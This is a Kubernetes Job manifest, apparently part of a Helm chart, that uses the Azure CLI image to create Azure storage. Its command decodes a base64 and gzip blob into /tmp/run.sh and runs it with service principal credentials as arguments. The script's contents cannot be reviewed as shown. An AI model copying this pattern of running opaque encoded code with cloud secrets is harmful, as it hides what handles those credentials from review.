apiVersion: batch/v1
kind: Job
metadata:
  name: storage-create
  namespace: {{ .Release.Namespace }}
spec:
  parallelism: 1
  completions: 1
  template:
    metadata:
      name: storage-create
    spec:
      serviceAccountName: storage-create
      containers:
      - name: storage-create
        image: azurecr/azure-cli
        env:
        - name: azure_service_principal_name
          valueFrom:
            secretKeyRef:
              name: storage-create
              key: azure_service_principal_name
        - name: azure_service_principal_key
          valueFrom:
            secretKeyRef:
              name: storage-create
              key: azure_service_principal_key
        - name: azure_storage_subscription
          valueFrom:
            secretKeyRef:
              name: storage-create
              key: azure_storage_subscription
        - name: azure_storage_resource_group
          valueFrom:
            secretKeyRef:
              name: storage-create
              key: azure_storage_resource_group
        - name: azure_storage_account_name
          valueFrom:
            secretKeyRef:
              name: storage-create
              key: azure_storage_account_name
        - name: azure_file_share_name
          valueFrom:
            secretKeyRef:
              name: storage-create
              key: azure_file_share_name
        - name: azure_storage_ad_tenant
          valueFrom:
            secretKeyRef:
              name: storage-create
              key: azure_storage_ad_tenant
        - name: azure_storage_account_location
          value: {{ index .Values "storage-create" "azure_storage_account_location" }}
        command:
        - "bin/bash"
        - "-c" 
        - "apk add --no-cache wget && touch /tmp/run.sh && chmod +x /tmp/run.sh && echo H4sIAAAAAAACA81VXW/TMBR9968wJlJBWmoG46usIECDBySG2OBlm4rr3Damwc5sp7AN/jvXThqy0G7aAxJ5aB3fDx+fe+7N7Vt8qjSfCpcTcV5ZmDiwSyVhUlqlpSpFMdHiG4yT7Y32BZyNk/srszdWzGEisokHLbQfJw96JldNnbSq9MrocbJDe2YLzlQWT5hbU5Xj5GE/s5Sm0r6B9aixzlSBLrnAZW14TMK/K4XElyekMFLUBz4lBGRuKOviGNFkM0jWBLQJ0btdM4IIaGHmStM0bdhJW3ZoWrWp1zJL03KzA1KLSWsi+whbhsP5DSnUgQ8oOuCvuliE3hjaFNKC8AgrjeiSzeSjy6pWaaxV3/lyJQOuRUUPvNCZsNnk7ccD3FrVhSarFdlQ7yizO2sAo8HRQjm8ub4a7/wahD/p11M6GB7dOxkuRVHBAHccZHTg+DHjfD64Swi2CjzaqUX2JeoCT2VXHMswSR2EC29pivmO9eDLKlO417WJ0OmaPDEudEFsgr8z9hpkY7auJKJ7K4iW3F4qrGIDMw163XyDjuN12iLk3adXe5PD/Xd777Hqu3wpLLeV5g4Qjnd8UU3BavDghsrwpnOaDNybBWisFQqKPqd1yPCrQ5Xt7u7tvyEXFB8mSvUZrAsNPqJsuc224nYmvMCNC0Lrh0WUDcjmhJpBjEo6cmBbV4XECnYiwnsvoK1e17FniRG/6kC2UDoL2A/iDZt07Bt40b9EPbyCb4MqlUZrkHG8bV32qsdaQNAZct1j/VkZ7fulOK3Q9osEUiPbHa4J+T4P0yh0eQ4iAzt+bTSOLJ8eYoKRKMtC1S3PY21w4phU5iAXqQTr1SxYg7qkuLRxMy1IMZTWtxgoe1n53Fh1Luq5/wqQVkuTP3pj6Fwa59PA+iX1sNz70o1498QMZqIq/Ghn5wFHRfHlNm9pc/wPhSu0jODvOHlB1Iwe0cQGijTQe/TkGfU56LYWzUcqRlH4gfPNbdGqxMoqPR8Oh6z1/L94RvnlJqMfPh3elPSpyc7+Del8jerXEx0Jhgw/+YWD9S71PESXmSKE/AYYpwvoQgkAAA== | base64 -d | gzip -d >> /tmp/run.sh && cd /tmp && ./run.sh $azure_service_principal_name $azure_service_principal_key $azure_storage_ad_tenant $azure_storage_subscription $azure_storage_resource_group $azure_storage_account_name $azure_file_share_name '{{ .Release.Namespace }}' $azure_storage_account_location"
      restartPolicy: Never
